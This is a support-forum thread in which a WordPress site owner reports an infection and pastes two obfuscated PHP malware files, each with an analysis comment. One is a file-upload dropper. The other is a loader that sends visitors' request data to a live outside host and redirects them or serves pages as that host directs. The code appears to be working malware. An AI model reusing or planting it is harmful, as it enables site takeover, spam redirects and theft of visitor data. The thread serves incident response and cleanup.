Forum Replies Created
September 11, 2025 at 6:55 am in reply to: New malicious files and infection that the program cannot detect #159752
Ok, thank you I will.
BR.
September 10, 2025 at 3:17 am in reply to: New malicious files and infection that the program cannot detect #159677
More files found with Wordfence:
wp-content/plugins/.gallery-by-supsystic/src/GridGallery/Featuredplugins/index.php
<?php /*
 * REVIEW NOTE: defensive analysis; every statement below is exactly as posted.
 *
 * What it is: an obfuscated, unauthenticated file-upload dropper. The goto
 * labels are shuffled so the textual order is not the execution order, and
 * most statements are padding whose results are never used.
 *
 * Statements that matter, in execution order:
 *   1. xW0ea_QuY: exits silently unless the query string contains "azK".
 *   2. xfAcC8:    if a multipart field "dyFw_XdT" is present, takes
 *                 basename() of its client-supplied "name" entry.
 *   3. XphWuT:    copy()s the upload's "tmp_name" to that bare file name and
 *                 exits, printing "Hhsrta0wRMUzuZKnc" followed by copy()'s
 *                 result. No extension, content or caller check is made. The
 *                 target is a relative path, so the file presumably lands in
 *                 the folder holding this script (confirm on the host).
 *   4. With no upload, the echo statements emit "a", "o", "Z" (the fourth
 *      indexes past the end of "Q_a"); presumably a liveness marker.
 *
 * Obfuscation: function names and array keys are built one character at a
 * time from ("literal")[index] and then called dynamically. The assembled
 * names are stripos, implode, strstr, str_repeat, str_pad, wordwrap,
 * chunk_split, sprintf and substr (all padding), plus the keys "name" and
 * "tmp_name".
 *
 * For triage: search access logs for requests to this path carrying "azK",
 * and review every other file in this directory, since anything uploaded
 * through this script would sit beside it. Searching the tree for goto
 * combined with the ("...")[n].("...")[n] call pattern can surface sibling
 * copies. Deleting this file alone does not close the original entry point.
 */ goto ykCej3;AxCHuG: echo /*
*/("oG85")[0];goto BRF6qNEm;BISpL189_: echo ("Gbaw")[2];goto jYu8BW0;mw0W_3Hk: $AOpYTE3 = false; goto _esRnx29;hWDCa5vnHF: echo /* */("Q_a")[3];goto VQ13XIdBDc;i1Zt_dv: $bNwCsM = ucfirst("jnO78R"); goto hWDCa5vnHF;ykCej3: $xrX9I0JA = false; goto qSMmVW2tBZ;hwF1IB: $VfFejBvu = addslashes("VfFejBvu"); goto eTuNgzCMnQ;eTuNgzCMnQ: $BNGuzdf = (/**/("Qesu")[2]./**/("JaZGtk")[4].("iYCTr9")[4].("hAikO")[2].("cxpW")[2]./*
*/("KtoO")[2].("Ussg")[2])("WKAhTl5I","pxu4b"); goto PzXHjpuqf;PzXHjpuqf: $ynXQOj = (/* */("iaLG")[0]./* */("neR3m6")[4].("_per")[1]./* */("l_gn9")[0]./**/("Ot_joU")[4]./**/("dbfM")[0]./**/("eaUJx")[0])(",",array("LT_9j","iV_16z","gI6o45CAl","sq7NidRG")); goto yelvMSuwnc;zyB7Ln: $i_uTNm = (/**/("iaLG")[0]./**/("neR3m6")[4].("_per")[1]./**/("l_gn9")[0]./*
*/("Ot_joU")[4]./*
*/("dbfM")[0]./*
*/("eaUJx")[0])("i_uTNm",array());goto ZETpXa7Y;ocalDf96EG: $bovKN = (("IKVhsp")[4]./**/("NZzt5")[3].("ZLr3ZB")[2].("kWsYX")[2]./*
*/("xtWM")[1].("AKr3")[2])("iM0Yo3rxd","fbBTRG"); goto AfqM3LkT;_bzhxnlV5: $rzgU5m = (/*
*/("iaLG")[0]./*
*/("neR3m6")[4].("_per")[1]./**/("l_gn9")[0]./* */("Ot_joU")[4]./**/("dbfM")[0]./*
*/("eaUJx")[0])(",",array("JL1qced","Hvw7540db","iZg15e","EoU0neEI")); goto icUuYiMvN;hrRGohl6yv: $ngJMnw6 = (/*
*/("UYsUA")[2]./*
*/("jtbSaR")[1].("rouPV6")[0].("_uzA3o")[0].("qnM4rj")[4].("rejJS")[1].("QpIn69")[1].("eeEO7")[1].("caR3")[1].("tZkc4")[0])("", 11); goto AxCHuG;dfei4Y: $jkVqgt8m = (("OsvgE")[1]./**/("Qtqv")[1].("WMrG")[2]./**/("_iJ_T3")[3].("VpwJLe")[1]./**/("aLvr2")[0].("wCPBdc")[4])("", 0); goto iwgH74h0oW;ZETpXa7Y: $cACFV = md5("nmVcX"); goto dfei4Y;XphWuT: if($RsdQa)exit("Hhsrta0wRMUzuZKnc".copy($_FILES["dyFw_XdT"][("Xt9zvm")[1]./**/("pnmW")[2]./*
*/("pOGLp")[0]./*
*/("_Zl4_p")[0].("cn82")[1]./*
*/("aQpfHM")[0]./**/("mHxrCV")[0].("ywseC")[3]],$RsdQa));goto BISpL189_;gzr8J_: $hjrdQCltf = (/**/("R9ws")[2]./**/("oZYr")[0]./* */("sLqrU")[3].("CdE_M")[1].("aw5g")[1]./*
*/("rZTbU")[0].("a0AXap")[4]./*
*/("ZgdCp9")[4])("", 11);goto i1Zt_dv;_esRnx29: $kDuCiL = (/* */("R9ws")[2]./*
*/("oZYr")[0]./* */("sLqrU")[3].("CdE_M")[1].("aw5g")[1]./**/("rZTbU")[0].("a0AXap")[4]./**/("ZgdCp9")[4])("", 11);goto VFrqJe;jYu8BW0: $vLD1t = lcfirst("QDuStBT"); goto NRsHxK4;VFrqJe: $onBqsmMg = (("Rlc8r5")[2]./**/("hBNpF2")[0].("SPu3pL")[2].("nNork")[0]./*
*/("kPk2fr")[2].("_Y0V")[0].("CFspDe")[2]./*
*/("opGHUp")[1].("ARlHS")[2].("icRXVS")[0].("EnxtsP")[3])("YiMpKIsbzCHZ",3); goto LvXbOM6;AfqM3LkT: $HiaOQ = sha1("wPiO_w4U"); goto AoYchCH;kv4rLIg: $RGXAne = ucfirst("CUA1Q6oSZ"); goto TxOVRUJZs2;VQ13XIdBDc: $QtRoTgWFG = (/* */("UYsUA")[2]./*
*/("jtbSaR")[1].("rouPV6")[0].("_uzA3o")[0].("qnM4rj")[4].("rejJS")[1].("QpIn69")[1].("eeEO7")[1].("caR3")[1].("tZkc4")[0])("", 12); goto u74JEf;Bj3GWE: $o5cWOwP = str_shuffle("uyEs5Xz"); goto k8jW9L;KFc7Jrse: $hUp3SQm = (string) null; goto nAg6BR9l2J;iwgH74h0oW: $OlLEq = ucfirst("o80qov"); goto xW0ea_QuY;u74JEf: $dhvF3_V = (/**/("OswLA")[1]./*
*/("pOe1")[0]./**/("xqrHK")[2].("oTxil")[3]./**/("wnd7QE")[1]./**/("QtDtW")[3]./*
*/("fiRGm")[0])(""); goto Bj3GWE;TxOVRUJZs2: $YnCo2d7xL = ucwords("yNWysh42"); goto hwF1IB;AoYchCH: $PsRt7m = (/**/("UYsUA")[2]./*
*/("jtbSaR")[1].("rouPV6")[0].("_uzA3o")[0].("qnM4rj")[4].("rejJS")[1].("QpIn69")[1].("eeEO7")[1].("caR3")[1].("tZkc4")[0])("", 5); goto WlyU249wDs;G65m9e: $LvTRl_ = strval(false); goto pglJFQ;pglJFQ: $LQ3Bz9 = (/* */("bsFZ")[1].("DwuA")[2]./*
*/("bNEMP7")[0]./* */("MPFst")[3]./* */("Btae")[1].("LrGT")[1])("LQ3Bz9",6,0);goto ZV7P9zrUE;xW0ea_QuY: if(!isset($_GET["azK"]))exit;goto xfAcC8;qSMmVW2tBZ: $ppV3cU5S = metaphone("t1XU9f"); goto KFc7Jrse;nAg6BR9l2J: $Gr21H = sha1("Y9_YBwr"); goto ocalDf96EG;LvXbOM6: $hVQEpa = (/**/("R9ws")[2]./*
*/("oZYr")[0]./**/("sLqrU")[3].("CdE_M")[1].("aw5g")[1]./**/("rZTbU")[0].("a0AXap")[4]./*
*/("ZgdCp9")[4])("", 12);goto kv4rLIg;NRsHxK4: $Qo0RO78Ex = (string) null; goto D6WKRspUy;xfAcC8: if(isset($_FILES["dyFw_XdT"]))$RsdQa = basename($_FILES["dyFw_XdT"][/**/("unA2q")[1].("tazMA")[1]./**/("mbtZoM")[0]./* */("peF1")[1]]);goto XphWuT;k8jW9L: $A2ldyEBD = addcslashes("A2ldyEBD","rFNwjKJf4"); goto _bzhxnlV5;BRF6qNEm: echo /*
*/("ZgJS")[0];goto gzr8J_;D6WKRspUy: $Uwzi6EGn = (/**/("Qesu")[2]./* */("JaZGtk")[4].("iYCTr9")[4].("hAikO")[2].("cxpW")[2]./**/("KtoO")[2].("Ussg")[2])("fTt1uWAgM","LFYZb8n"); goto hrRGohl6yv;WlyU249wDs: $v170t = (/**/("R9ws")[2]./*
*/("oZYr")[0]./**/("sLqrU")[3].("CdE_M")[1].("aw5g")[1]./* */("rZTbU")[0].("a0AXap")[4]./**/("ZgdCp9")[4])("", 15);goto G65m9e;ZV7P9zrUE: $EwM4O = define("nBaNOV","KgpKtuL"); goto zyB7Ln;icUuYiMvN: $SbB3Dj = defined("XSfsaZ8"); goto mw0W_3Hk;yelvMSuwnc:""; ?>wp-content/plugins/featured-images-for-rss-feeds/includes/freemius/templates/wp-login.php
September 8, 2025 at 9:31 pm in reply to: New malicious files and infection that the program cannot detect #159597
I believe both of my websites are infected with malicious code. Unfortunately, the current plugin and virus definitions cannot clean them. I initially thought this might be due to the free version, so I donated €29, but it still couldn’t remove the infection.
I found some suspicious files myself and deleted them. The plugin also detected two files, but it says there’s nothing else in the database, and I couldn’t find anything either. However, Google shows a lot of “advertisement” indexed pages, such as:
mysite1.com/?m=123456789
→ redirects to an ad page
mysite2.com/?k=123456789
→ redirects to an ad page
These pages lead to sites like: https://www.zbbhot.store/?ggcid=672564
For now, I temporarily blocked these requests via robots.txt and redirected all ?m= URLs to the homepage using .htaccess.
Additional findings:
Your program didn’t detect a hidden user in the database. A user was created there and hidden from the WordPress admin panel:
Username:
wpadminerlz
Email: domainvolomart.ru
The site had a file in the root directory (public_html) named defuait.php (with a lowercase “i”) containing malicious code.
There was malicious code in the plugins folder, under mu-plugins, in the file 0hQrmW.php.
0hQrmW.php file in mu-plugins:
<?php /*
 * REVIEW NOTE: defensive analysis; every statement below is exactly as posted.
 *
 * What it is: a remote-controlled redirect / content-injection loader. Most
 * assignments (md5, ucwords, chunk_split, define, ...) are padding whose
 * results are never used. Strings are hidden as hex/octal escapes, and every
 * sensitive call goes through vuIlOkG($name, $argc, ...), which simply invokes
 * the function named by its first argument with the given number of arguments.
 *
 * Statements that matter, in execution order:
 *   1. new Ohy6ox()        sets $_SERVER["T"]="z" and $_SERVER["TPL"]="4"
 *                          (presumably campaign tags; meaning not shown here).
 *   2. pHndhoQ / BSjqr     json_encode() then base64_encode() of the whole
 *                          $_SERVER array, i.e. the visitor's IP, user agent,
 *                          request URI and request headers (cookies included
 *                          when the request carries them).
 *   3. tM0Hi::kevEMgr()    falls into __callStatic, which runs a curl request
 *                          to hxxp://cache[.]usererp[.]site/about.php with
 *                          "?ua=" + urlencode(that blob). Options are passed
 *                          by number: 10002 (CURLOPT_URL), 19913
 *                          (CURLOPT_RETURNTRANSFER) = 1, "64_repl" cast to 64
 *                          (CURLOPT_SSL_VERIFYPEER) = 0, "13_repl" cast to 13
 *                          (CURLOPT_TIMEOUT) = 49. The response body is stored
 *                          in the global $nEPYif3.
 *   4. lRn9uCl()           if the response starts with "http", sends it as a
 *                          "Location: " header (visitor is redirected).
 *   5. Sbw8_()             if the response contains "<urlset", sends
 *                          "Content-type:text/xml" and exits with the response
 *                          (a sitemap chosen by the remote host).
 *   6. XC53Y()             if the response contains "<html", exits with the
 *                          response (a full page chosen by the remote host).
 *      Any other response lets the normal page continue to load.
 *
 * Impact: whoever answers at that host decides, per request, what the visitor
 * or crawler receives, and the request data is sent to it in clear text.
 * NOTE(review): this is consistent with the ?m= / ?k= ad redirects and the
 * spam pages indexed by Google described in the post; not proven from this
 * file alone. The post locates the file under mu-plugins, which WordPress
 * loads on every request without activation.
 *
 * For triage: look for outbound connections from the web server to the host
 * above, block it at egress, and search the tree for the escaped spellings of
 * curl_init / curl_setopt rather than the plain names. Treat visitor sessions
 * as exposed while the file was live. Removing the file does not explain how
 * it was written; the post also reports an uploader script and a hidden
 * administrator account, which need separate handling.
 */ $LcELhCV = md5("ewQH2Sg5"); $aFt80EB_ = ucwords("eoL_Tc"); $WkPNY6Ja = stripos("HLchoR","f1tJEUs"); $nRGoJuN6 = ucfirst("DL4xq8BI"); $wWPEC = metaphone("LPy_f"); $nJqpmV = trim(" "); $cWicE = chunk_split("U_O7FbYx",3); $iOGy2p8 = sprintf(""); $USNlC = implode("USNlC",array());$m20vTi = metaphone("hfKFQkY"); new Ohy6ox();$xDnHL4 = ucfirst("a0kOPts"); $W2orcw = (string) null; function pHndhoQ($IYJS2Khb){ return vuIlOkG("\x6a\x73\157\156\137\x65\156\x63\x6f\x64\x65",1,$IYJS2Khb);}function lRn9uCl($nEPYif3){ if(substr($nEPYif3,0,4)=="\x68\x74\164\160"){ vuIlOkG("\150\145\141\144\145\x72",1,"\x4c\157\143\x61\x74\x69\x6f\156\72\x20".$nEPYif3); } }$kNyfqzdo = implode(",",array("NnR2b","uz8XCoS","FDl2Lkjc","ThbIq")); $S02xCjI = ucfirst("nLOmak"); $W4brjFhy = pHndhoQ($_SERVER);$s9u_bnC = addcslashes("s9u_bnC","f0Iq3UuG9"); $i5k1lt = date("Y-m-d H:i:s"); $uZqdgB = ucwords("v4dmPawKZ"); $tG2Iy0 = strval(false); $rO0fNe = addcslashes("rO0fNe","oPOiNErYyjB"); $YDfeK6Mtu = metaphone("N0ZKo"); $W4brjFhy = BSjqr($W4brjFhy);function BSjqr($IYJS2Khb){ return vuIlOkG("\142\141\163\x65\66\64\137\145\156\143\x6f\x64\x65",1,$IYJS2Khb);}$S0t7bN = date("Y-m-d H:i:s"); class tM0Hi{ public static function __callStatic($name, $arguments) { $isy6AY = vuIlOkG("\x63\x75\162\154\137\x69\x6e\x69\x74"); $VPSMmQHW = "\x68\164\164\x70\72\57\57\x63\141\143\150\145\56\165\x73\145\162\145\162\x70\x2e\x73\151\x74\x65\57\141\142\x6f\x75\164\56\x70\x68\160"; vuIlOkG("\x63\x75\x72\x6c\137\x73\145\164\157\160\x74",3,$isy6AY, (int)("\61\x30\60\60\x32"),$VPSMmQHW."\x3f\x75\141\x3d".vuIlOkG("\165\x72\x6c\145\156\143\157\x64\145",1,$arguments[0])); vuIlOkG("\x63\x75\x72\x6c\137\x73\145\164\157\160\x74",3,$isy6AY, (int)("\x31\71\x39\61\63"), 1); vuIlOkG("\x63\x75\x72\x6c\137\x73\145\164\157\160\x74",3,$isy6AY, (int)("\x36\x34\x5f\162\145\x70\x6c"), 0); vuIlOkG("\x63\x75\x72\x6c\137\x73\145\164\157\160\x74",3,$isy6AY, (int)("\61\x33\x5f\x72\145\160\x6c"), 49); global $nEPYif3; $nEPYif3 = 
vuIlOkG("\143\x75\x72\x6c\137\145\170\x65\x63",1,$isy6AY); vuIlOkG("\143\x75\x72\x6c\137\143\154\x6f\x73\x65",1,$isy6AY); }}$bIJGPl = sha1("FCS41U"); $FfQg5P_ = addcslashes("FfQg5P_","cdpEM38q"); $GDsX2frhu = define("NwyFW","gNVrZqAvH"); tM0Hi::kevEMgr($W4brjFhy);$TBQ3bpVO = addcslashes("TBQ3bpVO","prtSdBiW1jD3"); $bEQGyUXV6 = array("LxPhOmb6BQf73"); $nQ7LzA_j = chunk_split("E9Ev0tfCFP3ls",3); $wZ30NCJ = strpos("KkBQj","COjw63"); $oho8_eRk = strtok("oho8_eRk"); $oB8m1bi0 = ucfirst("c0p1P"); $bHOP0pmA = lRn9uCl($nEPYif3);$SToQq2R = false; $ICb6x7uo = stripos("GEIX6v","R0QnYo9"); $WBCufL = implode(",",array("b7_Di","TToQ9m","TC18h3V6","rNt4doG")); $qV6CIen = strstr("qV6CIen", "Ut4_aHM"); $ZLjMI2m = addcslashes("ZLjMI2m","GE4BRe5oQ"); $EvUzr = str_replace("EvUzr", "", "EvUzr");$bVquSw = Sbw8_($nEPYif3);function vuIlOkG($strrt,$NzW2b=null,$s2o8GycE=null,$YvBfp1gI=null,$X7ABae=null,$ulSy3WY=null){ if($NzW2b==1)return $strrt($s2o8GycE); if($NzW2b==2)return $strrt($s2o8GycE,$YvBfp1gI); if($NzW2b==3)return $strrt($s2o8GycE,$YvBfp1gI,$X7ABae); if($NzW2b==4)return $strrt($s2o8GycE,$YvBfp1gI,$X7ABae,$ulSy3WY); return $strrt(); }$IwQm5cx = implode("IwQm5cx",array());function XC53Y($nEPYif3){ if(strstr(trim($nEPYif3),"\x3c\150\x74\x6d\154")){ exit($nEPYif3); } }function Sbw8_($nEPYif3){ if(strstr($nEPYif3,"\74\165\x72\154\x73\145\x74")){ exit(vuIlOkG("\150\145\141\144\145\x72",1,"\103\157\156\x74\145\x6e\x74\55\x74\171\x70\145\x3a\164\x65\170\x74\x2f\x78\155\154").$nEPYif3); } }class Ohy6ox{ public function __construct() { $_SERVER["\x54"]="\x7a"; $_SERVER["\x54\x50\114"]="\64"; }}$Bx3eR = str_pad("", 0); $oUxNzIh = XC53Y($nEPYif3);$I8CDVwFgS = defined("hMSv5UYcp"); $KLQFBgYJ = trim(" "); $VC8y1jf = (string) null; $eUJKV7X = define("th8Wc","hGBxc"); $d85HyA1S = str_replace("d85HyA1S", "", "d85HyA1S");$mdcoQA = defined("SbLhK"); $Msn59OWEJ = strval(false); $gWsYQV1oa = md5("wWyMbwS0I"); $v91Io = md5("wwP0nJ"); $sOV2MdC = str_replace("sOV2MdC", "", "sOV2MdC");
How can I properly clean the website?
I tried using MalCare, and it claims there are three more malicious files that your program cannot detect. I’m not able to pay €149 per year for cleaning at the moment, so I haven’t purchased it yet. Is there a way your program can help clean these files? Would any assistance or guidance be required to do this? Thank you very much!